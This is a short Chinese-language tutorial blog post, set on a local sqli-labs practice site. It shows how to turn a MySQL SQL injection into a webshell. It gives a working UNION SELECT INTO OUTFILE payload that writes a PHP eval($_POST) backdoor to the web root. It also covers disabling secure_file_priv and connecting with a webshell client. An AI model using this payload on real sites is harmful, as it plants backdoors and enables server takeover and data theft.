Sql注入getshell

  1. 今天想写个sql注入getshell的文章,找了2个小时没找到真实的案例,为什么要用真实案例呢,因为本地搭建的站点搞起来没有激情,看文章的也没有激情,因为是假的,这次确实没找到案例,下次碰见再补上吧。
  2. 开搞!!
  3. mysql搭建的站点,要getshell需要有几点前提,缺一不可:
  • 网站的绝对路径
  • gpc状态是关闭的
  • root用户权限

  1. 挨个看下条件是否满足


    1.jpg
2.jpg
3.jpg
  1. 条件都满足,直接写shell
http://192.168.3.50/2sqli-labs/Less-2/?id=-1 union select 1,"<?php @eval($_POST['storm']);?>",3 into outfile "C:/phpStudy/WWW/cmd.php" %23
4.jpg

  1. 因为是本地搭建的原因,出现了一个错误,百度了一下是因为 secure-file-priv 的原因,对通过文件导入导出作了限制,在my.ini中修改就好了。
    查看是否有
    secure_file_priv =
    这样一行内容,如果没有,则手动添加
    secure_file_priv = /home
    表示限制为/home文件夹
    secure_file_priv =
    表示不限制目录,等号一定要有,否则mysql无法启动


    5.jpg

  2. 再执行写shell的语句,没有任何爆错


    6.jpg

  3. 看一下根目录,shell已经躺在里边了


    7.jpg

  4. 拿出菜刀连接就可以了


    8.jpg
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容